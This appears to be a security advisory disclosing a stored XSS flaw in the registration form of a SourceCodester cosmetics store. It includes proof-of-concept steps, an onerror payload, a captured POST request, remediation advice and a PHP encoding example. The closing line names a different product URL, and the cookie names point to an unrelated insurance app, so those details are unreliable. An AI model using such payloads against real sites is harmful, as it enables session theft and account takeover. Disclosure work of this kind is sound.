Stored Cross-Site Scripting Vulnerability in SourceCodester Cosmetics and Beauty Product Online Store - 1.0
Vendor: Sourcecodester
Product: Cosmetics and Beauty Product Online Store - 1.0
Product URL: Cosmetics and Beauty Product Online Store - 1.0
Executive Summary
A Stored Cross-Site Scripting (SXSS) vulnerability in Cosmetics and Beauty Product Online Store - 1.0 and earlier allows an attacker to inject malicious JavaScript code through the "First Name" input field. The injected code is stored persistently and executes whenever the vulnerable web page is viewed by any user, staff member or administrator. Because the malicious JavaScript can access the session cookies, this can result in account takeover.
Issue Details
Vulnerability Name: Stored XSS in First Name
Severity: High
Affected URL: http://localhost/cbpos/classes/Master.php?f=register
Affected Parameter: First Name
HTTP Method: POST
Issue Description
The web application is vulnerable to Stored Cross-Site Scripting (SXSS) in the "First Name" input field. An attacker can exploit this by placing malicious JavaScript code in the HTTP POST request that creates the user account. In the example provided, the attacker modifies the "First Name" parameter to insert JavaScript code that can also access the authentication cookies.
Proof Of Concept
Configure a web proxy in your browser.
Navigate to http://localhost/cbpos/classes/Master.php?f=register in the browser.
Fill in the desired data in the input fields.
Intercept the request in the web proxy.
Modify the firstname parameter as shown below and send the request to the server.
firstname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&lastname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&contact=6280957713&gender=Male&default_delivery_address=ssdfsfs&email=mohit.ahir7086%40gmail.com&password=Ramasra1247%40
In the browser, create the account and navigate to the homepage.
https://drive.google.com/file/d/1ZoSWqudhD-uPAmaU_E04IMSdm7VBI_fu/view?usp=drive_link
Payload:
firstname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&lastname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&contact=6280957713&gender=Male&default_delivery_address=ssdfsfs&email=mohit.ahir7086%40gmail.com&password=Ramasra1247%40
Request:
POST /cbpos/classes/Master.php?f=register HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 227
Origin: http://localhost
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://localhost/cbpos/
Cookie: PHPSESSID=p74o2f7lqfitvojtejdnshjrau; __insuarance__logged=1; __insuarance__key=7273YL1ZQOZ448QSLS6V
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
firstname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&lastname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&contact=6280957713&gender=Male&default_delivery_address=ssdfsfs&email=mohit.ahir7086%40gmail.com&password=Ramasra1247%40
Impact:
Stored XSS attacks can have serious consequences, such as account takeover by stealing cookies, theft of sensitive data, modification of the web page content, or redirection of users to malicious sites.
Remediation:
Implement proper input validation and output encoding to prevent malicious code from being injected into the web application. Use server-side validation to ensure that user input is properly sanitized before it is stored in the database or displayed on a web page. Use output encoding so that any user input displayed on the web page is encoded for its HTML context and cannot be executed as script.
References:
https://portswigger.net/web-security/cross-site-scripting/stored
https://owasp.org/www-community/attacks/xss/
Weakness Enumeration:
CWE-79
This report documents the Stored XSS vulnerability present in the First Name parameter of http://localhost/e-insurance/Script./core/new_account, including the Proof of Concept, its impact, remediation steps and references for further guidance on mitigation strategies.
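The remediation described above, applied to the firstname value from the captured request, as an added PHP example that is not code from this report or from the SourceCodester project; only the firstname value comes from the request body, and the way cbpos stores and renders the name (render_unsafe) is an assumption used for illustration.

```php
<?php
// Added example, not code from the report or the cbpos project.
// Only the firstname value is taken from the captured request body;
// how cbpos stores and renders the name is an assumption.

$body = 'firstname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&lastname=Doe';
parse_str($body, $params);          // decodes application/x-www-form-urlencoded
$first = $params['firstname'];      // the decoded payload, as PHP would receive it

// Assumed vulnerable pattern: the stored value is echoed unencoded into an
// HTML attribute, so the leading "> closes the attribute and the tag and the
// injected <img> element becomes part of the page.
function render_unsafe(string $name): string {
    return '<input type="text" value="' . $name . '">';
}

// Remediation 1: output encoding for the HTML attribute context.
// ENT_QUOTES encodes both quote characters, so the value cannot break out
// of value="" and < > are shown as literal text.
function render_safe(string $name): string {
    $enc = htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" value="' . $enc . '">';
}

// Remediation 2: server-side validation before storage. A person's name has
// no need for < > " or =, so the registration handler should reject such
// input rather than try to strip it (allow-lists are easier to get right).
function valid_name(string $name): bool {
    return preg_match('/^[\p{L}\p{M}\' .-]{1,50}$/u', $name) === 1;
}

if (!valid_name($first)) {
    echo 'Registration rejected: first name contains disallowed characters', PHP_EOL;
}
echo render_unsafe($first), PHP_EOL;   // markup from the payload survives unencoded
echo render_safe($first), PHP_EOL;     // markup is rendered as inert text
```

Applying valid_name() at the register handler and render_safe()-style encoding at every place the name is printed covers both halves of the remediation; encoding alone still leaves the raw payload in the database for other consumers.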